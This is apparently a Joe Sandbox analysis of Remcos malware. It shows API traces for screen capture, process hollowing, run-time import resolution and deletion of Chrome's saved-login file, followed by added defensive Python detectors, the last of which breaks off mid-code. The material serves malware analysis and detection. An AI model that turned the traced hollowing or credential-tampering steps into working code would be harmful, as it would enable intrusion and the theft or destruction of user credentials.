                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                              • GetProcAddress.KERNEL32(00000000), ref: 00407D86
                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                              • GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                              • GetProcAddress.KERNEL32(00000000), ref: 00407E00
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                              • API String ID: 551388010-3266460993
                              • Opcode ID: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                              • Instruction ID: 7df7edf4bea3ca915ca9c3ab11915317f4629f066757df969619983bfa8a711c
                              • Opcode Fuzzy Hash: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                              • Instruction Fuzzy Hash: D8112EF0E51794FAC720ABB6AC49FDA2E9CAA8C7513118427F204D3570D6BC94C08E6D
                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040D731
                              • CreateCompatibleDC.GDI32(00000000), ref: 0040D73D
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040D74F
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040D757
                              • CreateCompatibleBitmap.GDI32(00000000,76F90F00,00000000), ref: 0040D760
                              • SelectObject.GDI32(@YA,00000000), ref: 0040D779
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D8B2
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8F0
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,00000000), ref: 0040D8FD
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E,?,00000000), ref: 0040D90C
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D919
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028,?,00000000), ref: 0040D925
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D932
                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,?,?,00000000), ref: 0040D93F
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D94C
                              • DeleteObject.GDI32(?), ref: 0040D955
                              • GlobalFree.KERNEL32(00000000), ref: 0040D95C
                              • DeleteDC.GDI32(?), ref: 0040D96B
                              • DeleteDC.GDI32(?), ref: 0040D970
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,00000000), ref: 0040D979
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D982
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D98B
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@V01@@$?assign@?$basic_string@CreateD@1@@DeleteV01@V12@Y?$basic_string@$??1?$basic_string@CapsCompatibleDeviceObject$BitmapFreeGlobalSelect
                              • String ID: @YA$DISPLAY
                              • API String ID: 2042352699-3806539182
                              • Opcode ID: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                              • Instruction ID: 01507db8c7ea154ffe35bb8a62b7e06070cb60eb7de7f760769c3134c364176c
                              • Opcode Fuzzy Hash: f8ea951f423c690b1eb50e56cfb3c698429a31a2134a368dde3a1e94205186cb
                              • Instruction Fuzzy Hash: 3F813E75900209AFDB10DFA1DC88EDEBBB8FF48700F10842AF556E7190E775AA49CB58
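The function listed above is a screen grab: it opens the display DC with CreateDCA("DISPLAY"), sizes a compatible bitmap from GetDeviceCaps(HORZRES = 8, VERTRES = 10), and then appends three pieces to a std::string with ?assign: 14 bytes whose first dword the sandbox prints as 00004D42 (the bytes 42 4D, "BM", read little-endian), 0x28 = 40 bytes, and the pixel buffer. Read that way the string holds a complete in-memory BMP (BITMAPFILEHEADER + BITMAPINFOHEADER + pixels). The Python below is an added example, not code from the report or from Remcos: it carves BMPs with exactly that layout out of an arbitrary byte blob (a process dump or a decrypted C2 buffer) and reports offset and dimensions. Treating the three assign calls as the three BMP parts is the editor's interpretation of the listing; build_bmp exists only to construct the sample blob, which is not taken from the report.

```python
"""Carve in-memory BMP captures laid out the way the 0040D731 function above
builds them: 14-byte BITMAPFILEHEADER ("BM"), 40-byte BITMAPINFOHEADER, pixels.

Added example for this report, not Remcos or Joe Sandbox code.  Reading the
three ?assign calls (lengths 0xE, 0x28 and the pixel size) as those three BMP
parts is the editor's interpretation of the listing; SAMPLE_BLOB is constructed.
"""
import struct

BMP_MAGIC = b"BM"
FILE_HEADER_LEN = 14          # BITMAPFILEHEADER
INFO_HEADER_LEN = 40          # BITMAPINFOHEADER, biSize == 40
HEADERS_LEN = FILE_HEADER_LEN + INFO_HEADER_LEN


def build_bmp(width, height, bpp=24, pixels=None):
    """Assemble file header + info header + pixels (test data only)."""
    row = ((width * bpp + 31) // 32) * 4                 # rows are 4-byte aligned
    pixels = pixels if pixels is not None else bytes(row * height)
    file_hdr = struct.pack("<2sIHHI", BMP_MAGIC, HEADERS_LEN + len(pixels), 0, 0, HEADERS_LEN)
    info_hdr = struct.pack("<IiiHHIIiiII", INFO_HEADER_LEN, width, height, 1, bpp,
                           0, len(pixels), 2835, 2835, 0, 0)
    return file_hdr + info_hdr + pixels


def carve_bmps(blob):
    """Return (offset, width, height, bpp, size) for every plausible BMP in blob.

    A hit needs the pixel offset to be exactly 54 (headers back to back, as in
    the listing), biSize == 40, one plane, a sane bit depth and geometry, and
    the declared file size to fit inside the blob."""
    hits = []
    pos = blob.find(BMP_MAGIC)
    while pos != -1:
        hdr = blob[pos:pos + HEADERS_LEN]
        if len(hdr) == HEADERS_LEN:
            _, size, _, _, off = struct.unpack_from("<2sIHHI", hdr, 0)
            bi_size, w, h, planes, bpp = struct.unpack_from("<IiiHH", hdr, FILE_HEADER_LEN)
            if (off == HEADERS_LEN and bi_size == INFO_HEADER_LEN and planes == 1
                    and bpp in (1, 4, 8, 16, 24, 32)
                    and 0 < w < 20000 and 0 < abs(h) < 20000      # h < 0 means top-down
                    and pos + size <= len(blob)):
                hits.append((pos, w, abs(h), bpp, size))
                pos = blob.find(BMP_MAGIC, pos + size)       # skip over the image body
                continue
        pos = blob.find(BMP_MAGIC, pos + 1)
    return hits


# Constructed sample: junk, a 640x480 24-bit capture, a stray "BM" that is not a
# bitmap, a tiny 4x2 bitmap, trailing junk.  Not taken from the report.
SAMPLE_BLOB = (b"\x00" * 17 + build_bmp(640, 480) + b"BM not a bitmap"
               + build_bmp(4, 2) + b"\xff" * 5)
```

The decoy "BM" in the sample is rejected because its bfOffBits field is not 54, which is the check that separates a real capture from two bytes that happen to spell the magic; when a dump yields hits, the (offset, size) pairs can be sliced out and written to .bmp files directly.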
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004081C8
                                • Part of subcall function 0040F0B5: GetCurrentProcess.KERNEL32(u@,?,?,004075EA), ref: 0040F0C6
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004081DC
                              • Process32FirstW.KERNEL32(00000000,?), ref: 004081F5
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00408202
                              • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415268,00000002,00000000), ref: 00408223
                                • Part of subcall function 0040F0DF: OpenProcess.KERNEL32(00000400,00000000,?,?,00407F70,?), ref: 0040F0F5
                                • Part of subcall function 0040ED35: _itoa.MSVCRT ref: 0040ED53
                                • Part of subcall function 0040ED35: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040A186,?,00000000), ref: 0040ED67
                                • Part of subcall function 0040F16A: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040F17D
                                • Part of subcall function 0040F16A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040F1B5
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDE3
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(004118A0,00000000,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDF4
                                • Part of subcall function 0040EDD3: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EDFD
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE0A
                                • Part of subcall function 0040EDD3: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE15
                                • Part of subcall function 0040EDD3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(hRA,?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE34
                                • Part of subcall function 0040EDD3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415940,00415268,00415268,00000000,00415268,00000000), ref: 0040EE3D
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 0040829E
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082AE
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158,00000000,?,00410858), ref: 004082BB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,00411158,00000000,00411158,00000000,00411158), ref: 004082CB
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411158,00000000), ref: 004082D8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004082E8
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004082F5
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00408305
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408311
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040831D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408326
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408332
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040833B
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408347
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408350
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040835C
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408365
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040836E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040837A
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408386
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408392
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040839E
                              • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004083A7
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 004083B5
                              • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 004083C4
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004083D1
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004083DA
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@G@2@@std@@G@std@@$V10@V10@0@$D@1@@ProcessProcess32V01@@$?c_str@?$basic_string@?length@?$basic_string@G@1@@NextOpen$??4?$basic_string@CloseCreateCurrentFirstHandleSnapshotToolhelp32V01@_itoa
                              • String ID:
                              • API String ID: 2162064046-0
                              • Opcode ID: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                              • Instruction ID: 59879eeb23424d9b9582fbd1b4132700e7662ed198339718a96ed2a8ede2f5f3
                              • Opcode Fuzzy Hash: 90dc70f258533a68b46da8f8f7d027193591623f57b0638dd68ad9842d51368f
                              • Instruction Fuzzy Hash: 7A51EF7190011EABCB15EBA1DD4AEDEB77CAF54308F1044B6B506B2051EE789F4D8F68
                              APIs
                              • _EH_prolog.MSVCRT ref: 0040D47C
                              • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000,76F92EE0), ref: 0040D499
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D4A0
                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040D4F7
                              • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0040D50D
                              • GetThreadContext.KERNEL32(?,00000000), ref: 0040D522
                              • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D544
                              • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040D56C
                              • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040D58F
                              • WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040D5C9
                              • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D5E8
                              • SetThreadContext.KERNEL32(?,00000000), ref: 0040D5FA
                              • ResumeThread.KERNEL32(?), ref: 0040D603
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                              • String ID: NtUnmapViewOfSection$ntdll.dll
                              • API String ID: 65594003-1050664331
                              • Opcode ID: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                              • Instruction ID: 491b69bf14096d3796cb56c0b3543e1f41dcebd31bc2b04dfda4688c6db47199
                              • Opcode Fuzzy Hash: d5acba7396d781dfe8e0530a3340aeb650af1a56d6ef9ed814e80dd6dc194395
                              • Instruction Fuzzy Hash: C1515E71900208AFDB209FA4DC45FAEBBB9FF48314F10842AFA15E72A1D7759944DF18
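Two of the listings above are worth turning into reusable checks. The 00407D4B function resolves its sensitive APIs at run time through LoadLibraryA/GetModuleHandleA followed by GetProcAddress, so GetModuleFileNameExA/W, GlobalMemoryStatusEx, IsWow64Process, GetComputerNameExW, IsUserAnAdmin and SetProcessDEPPolicy never appear in the import table. The 0040D47C function performs the classic process-hollowing sequence: CreateProcessA with dwCreationFlags 0x4 (CREATE_SUSPENDED), NtUnmapViewOfSection looked up in ntdll.dll, GetThreadContext, VirtualAllocEx with protection 0x40 (PAGE_EXECUTE_READWRITE), three WriteProcessMemory calls (headers, sections, and the 4-byte image-base patch into the PEB), SetThreadContext and ResumeThread. The Python below is an added example, not Joe Sandbox's or Remcos' code: it parses trace lines in the format printed on this page, rebuilds the list of resolved imports, and flags the hollowing pattern. The trace constants are copied from the two listings; the assumption that the sandbox prints the GetProcAddress name string as the second argument of the preceding handle lookup (because it dumps stack slots as arguments) and the stage rules are the editor's reading of the listing.

```python
"""Parse Joe Sandbox API-trace lines, rebuild the imports resolved at run time,
and flag the process-hollowing call sequence.

Added example for this report (not Joe Sandbox or Remcos code).  The trace
constants are copied from the listings above; the stage rules and the 'second
argument is the GetProcAddress name string' assumption are the editor's.
"""
import re
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004        # CreateProcess* dwCreationFlags bit
PAGE_EXECUTE_READWRITE = 0x00000040  # VirtualAllocEx flProtect

# "• Name.MODULE(arg,arg,...), ref: ADDR"  or  "• Name.MODULE ref: ADDR"
_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<callee>[^(]+?)(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$"
)


@dataclass
class Call:
    name: str
    module: str
    args: list = field(default_factory=list)
    ref: str = ""

    def arg_int(self, i):
        """Argument i as an int, or None when it is missing or shown as '?'."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None


def parse_trace(text):
    """Turn the bullet lines of one 'APIs' block into Call objects, in order."""
    calls = []
    for line in text.strip().splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        name, _, module = m["callee"].strip().rpartition(".")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(Call(name, module, args, m["ref"] or ""))
    return calls


def resolved_imports(calls):
    """(module, function) pairs: each LoadLibrary*/GetModuleHandle* that is
    directly followed by GetProcAddress.  The function name is the second
    printed argument because the sandbox dumps stack slots (assumption)."""
    lookups = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}
    return [(cur.args[0], cur.args[1]) for cur, nxt in zip(calls, calls[1:])
            if cur.name in lookups and nxt.name == "GetProcAddress" and len(cur.args) >= 2]


def detect_process_hollowing(calls):
    """Return (verdict, stages); verdict is True only when every stage of the
    suspended-create / unmap / RWX-alloc / write / set-context / resume
    sequence is present, in that order."""
    st = {"suspended_create": False, "unmap_resolved": False, "rwx_remote_alloc": False,
          "writes": 0, "context_set": False, "resumed": False}
    for c in calls:
        if c.name in ("CreateProcessA", "CreateProcessW"):
            flags = c.arg_int(5)                                   # dwCreationFlags
            if flags is not None and flags & CREATE_SUSPENDED:
                st["suspended_create"] = True
        elif any("NtUnmapViewOfSection" in a for a in c.args):
            st["unmap_resolved"] = True
        elif c.name == "VirtualAllocEx" and c.arg_int(4) == PAGE_EXECUTE_READWRITE:
            st["rwx_remote_alloc"] = True
        elif c.name == "WriteProcessMemory" and st["rwx_remote_alloc"]:
            st["writes"] += 1
        elif c.name == "SetThreadContext" and st["writes"]:
            st["context_set"] = True
        elif c.name == "ResumeThread" and st["context_set"]:
            st["resumed"] = True
    verdict = all([st["suspended_create"], st["unmap_resolved"], st["rwx_remote_alloc"],
                   st["writes"] >= 1, st["context_set"], st["resumed"]])
    return verdict, st


# Copied from the 0040D47C listing above (process hollowing).
HOLLOWING_TRACE = """
• GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,00000000,00000000,76F92EE0), ref: 0040D499
• GetProcAddress.KERNEL32(00000000), ref: 0040D4A0
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0040D4F7
• GetThreadContext.KERNEL32(?,00000000), ref: 0040D522
• VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040), ref: 0040D56C
• WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000), ref: 0040D58F
• WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0040D5C9
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0040D5E8
• SetThreadContext.KERNEL32(?,00000000), ref: 0040D5FA
• ResumeThread.KERNEL32(?), ref: 0040D603
"""

# Excerpt of the 00407D4B listing above (run-time import resolution).
RESOLVE_TRACE = """
• LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
• GetProcAddress.KERNEL32(00000000), ref: 00407D54
• GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
• GetProcAddress.KERNEL32(00000000), ref: 00407DF0
"""
```

The detector deliberately keys on values, not just names: a CreateProcess without the 0x4 flag, or a VirtualAllocEx that asks for PAGE_READWRITE instead of 0x40, leaves the corresponding stage unset, so a normal suspended child start or a remote read/write buffer is not reported as hollowing on its own. The same parser runs unchanged over the other APIs blocks on this page.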
                              APIs
                              • getenv.MSVCRT ref: 00405637
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 00405642
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040564D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405658
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00405661
                              • DeleteFileA.KERNEL32(00000000), ref: 00405668
                              • GetLastError.KERNEL32 ref: 00405672
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],?,?,?,?,00000000), ref: 00405693
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056A6
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],?,?,?,?,00000000), ref: 004056CC
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,00000000), ref: 004056E1
                              Strings
                              • UserProfile, xrefs: 00405632
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040562C
                              • [Chrome StoredLogins not found], xrefs: 0040568E
                              • [Chrome StoredLogins found, cleared!], xrefs: 004056C7
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 3740952235-1062637481
                              • Opcode ID: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                              • Instruction ID: 4f69eec6fecf3c2889a810bfc1713c7a18bd464deb3961be00d6ef52500a67c9
                              • Opcode Fuzzy Hash: 9c470a860a31c0957fbf0af584cff9b589e999483a72c533940556fb038f18dd
                              • Instruction Fuzzy Hash: F0116331640509ABD700ABE4DD1EAFE7778EB54305F504477E402F21D0EEB95E88CBAA
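The function above reads getenv("UserProfile"), appends \AppData\Local\Google\Chrome\User Data\Default\Login Data, calls DeleteFileA on the result and picks its log line ("[Chrome StoredLogins found, cleared!]" or "[Chrome StoredLogins not found]") from GetLastError: it destroys the victim's saved Chrome credentials. On an endpoint this is visible as a file-delete event on that path issued by a process that is not the browser. The Python below is an added example, not code from the report or from Remcos, that applies that check to file-delete records. The Chrome path is taken from the strings above; generalizing "Default" to any profile directory, the Sysmon event IDs 23 and 26, the chrome.exe allowlist and the record layout are the editor's choices, and the sample events (including the updater.exe image name) are constructed.

```python
"""Flag deletions of the Chrome 'Login Data' credential store, which the
00405637 function above removes via getenv("UserProfile") + DeleteFileA.

Added example for this report, not Remcos or Joe Sandbox code.  The Chrome
path is taken from the strings above; matching every profile directory rather
than only 'Default', the Sysmon event IDs, the browser allowlist and the event
records below are the editor's assumptions and constructed data.
"""
import fnmatch
import ntpath

# Paths below %UserProfile%, lower-cased glob patterns.  '*' generalizes the
# 'Default' profile seen in the report to 'Profile 1', 'Profile 2', ...
CREDENTIAL_STORE_PATTERNS = (
    r"appdata\local\google\chrome\user data\*\login data",
)
# The browser rewrites its own store (journal swap), so its own deletes are
# noise; any other image removing the file is the signal.
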